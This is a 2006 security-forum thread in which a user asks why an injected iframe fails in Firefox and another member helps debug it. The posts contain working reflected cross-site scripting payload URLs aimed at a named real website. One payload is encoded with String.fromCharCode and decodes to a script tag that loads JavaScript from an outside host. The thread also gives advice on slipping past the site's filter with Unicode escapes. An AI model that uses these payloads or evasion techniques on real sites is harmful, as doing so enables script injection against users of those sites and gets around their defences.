Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Injecting iframe
Posted by: Girzi
Date: August 27, 2006 12:46PM

Hi,
Using an reflecting xss, I use it to make somethink like <script src="http://domain.com/myfile.js"></script> bu I had to encode it and use eval + String.fromCharCode. Now myfile.js contain this code :
document.write('<iframe src="http://domaine.com/"></iframe>');

In IE it works ! But FF doesn't want it ! Do you know why ?

Thanks for help



Edited 1 time(s). Last edit at 08/27/2006 12:46PM by Girzi.

Options: ReplyQuote
Re: Injecting iframe
Posted by: rsnake
Date: August 27, 2006 02:43PM

It could be a number of problems, can you show the entire string (encoded)? It is either a problem with how Firefox deals with JavaScript variables or something else weird... ooor it could be a problem with your particular browser (if you have iframes turned off in Greasemoney or something).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Injecting iframe
Posted by: Girzi
Date: August 27, 2006 02:56PM

Here is it :
http://www.homme.lycos.fr/hotbabes/categorie/%22%20%3Cbody%20onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,98,108,119,111,111,100,46,110,101,116,47,101,120,112,101,114,105,101,110,99,101,115,47,108,121,99,111,115,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59))%3E

(There were so weird filters :P)

Decoded : document.write('<script src=http://blwood.net/experiences/lycos.js></script>')


But i think i know why because my xss is loaded something like 30 times with a body onload =)

Anyway, I found another XSS much easyer to exploit on this site for my PoC =)



Edited 2 time(s). Last edit at 08/27/2006 02:58PM by Girzi.

Options: ReplyQuote
Re: Injecting iframe
Posted by: rsnake
Date: August 27, 2006 06:29PM

Hmmm... the basics work for me: http://www.homme.lycos.fr/hotbabes/categorie/%22%20%20%3Cbody%20onload=alert(%22XSS%22)%3E
If you just use document.write and escape the quote, etc... with things like \u0022 it should work. This is a common problem with XSS actually, running out of ways to quote things. In this case, it looks like \ does work, although / does not, so you should be okay to use Unicode JavaScript escapes.

Options: ReplyQuote
Re: Injecting iframe
Posted by: Girzi
Date: August 28, 2006 02:32AM

Yeah this on works : http://www.homme.lycos.fr/hotbabes/categorie/%22%20%20%3Cbody%20onload=alert(%22XSS%22)%3E

But I had to use encoded coz he dosen't like my / =)
Anyway I found another XSS much better.

Thx for help rsnakes :)

Options: ReplyQuote
Re: Injecting iframe
Posted by: rsnake
Date: August 28, 2006 10:20AM

Yah, but just to be clear, you actually don't have to encode the entire string just to get rid of a forward slash:

document.write("http:\u002F\u002Fha.ckers.org\u002F")

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Injecting iframe
Posted by: Girzi
Date: August 28, 2006 11:30AM

Ahhhh Ok Thx ! I didn't know this one O_o
I think I have to learn some details about encoding it's a very interresting stuff to bypass filters I saw =)

Thank you !


Ps : Do you have some interresting links about this stuff xD ?

Options: ReplyQuote


Sorry, only registered users may post in this forum.